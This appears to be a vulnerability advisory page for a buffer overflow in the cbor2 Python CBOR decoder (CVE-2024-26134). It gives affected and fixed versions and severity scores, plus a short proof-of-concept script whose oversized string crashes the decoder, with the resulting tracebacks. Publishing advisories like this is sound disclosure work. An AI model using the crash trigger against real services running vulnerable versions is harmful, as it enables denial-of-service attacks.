GHSA-375g-39jq-vq7m

Опубликовано: 21 фев. 2024

Источник: github

Github: Прошло ревью

CVSS3: 7.5

Описание

Potential buffer overflow in CBOR2 decoder

Summary

Ever since https://github.com/agronholm/cbor2/pull/204 (or specifically https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542) was merged, I can create a reproducible crash when running the snippet under PoC on a current Debian bullseye aarm64 on a Raspberry Pi 3 (I was not able to reproduce this on my x86_64 Laptop with Python 3.11; I suspect because there is enough memory to allocate still)

Details

PoC

import json import concurrent.futures import cbor2 def test(): obj = "x" * 131128 cbor_enc = cbor2.dumps(obj) return cbor2.loads(cbor_enc) with concurrent.futures.ProcessPoolExecutor() as executor: future = executor.submit(test) print(future.result())

malloc(): unsorted double linked list corrupted Traceback (most recent call last): File "test.py", line 14, in <module> print(future.result()) File "/usr/lib/python3.9/concurrent/futures/_base.py", line 440, in result return self.__get_result() File "/usr/lib/python3.9/concurrent/futures/_base.py", line 389, in __get_result raise self._exception concurrent.futures.process.BrokenProcessPool: A process in the process pool was terminated abruptly while the future was running or pending.

If one calls it without the indirection via the pool executor, a SystemError is shown that hides the buffer overflow.

import json import cbor2 def test(): obj = "x" * 131128 cbor_enc = cbor2.dumps(obj) return cbor2.loads(cbor_enc) print(test())

Traceback (most recent call last): File "test.py", line 12, in <module> print(test()) File "test.py", line 9, in test return cbor2.loads(cbor_enc) SystemError: <built-in function loads> returned NULL without setting an error

Impact

An attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object.

Ссылки

Пакеты

Наименование

cbor2

pip

Затронутые версииВерсия исправления

>= 5.5.1, < 5.6.2

5.6.2

EPSS

Процентиль: 74%

0.00809

Низкий

7.5 High

CVSS3

CVE ID

CVE-2024-26134

Дефекты

CWE-120

Связанные уязвимости

CVE-2024-26134

CVSS3: 7.5

ubuntu

почти 2 года назад

cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) (RFC 8949) serialization format. Starting in version 5.5.1 and prior to version 5.6.2, an attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object. Version 5.6.2 contains a patch for this issue.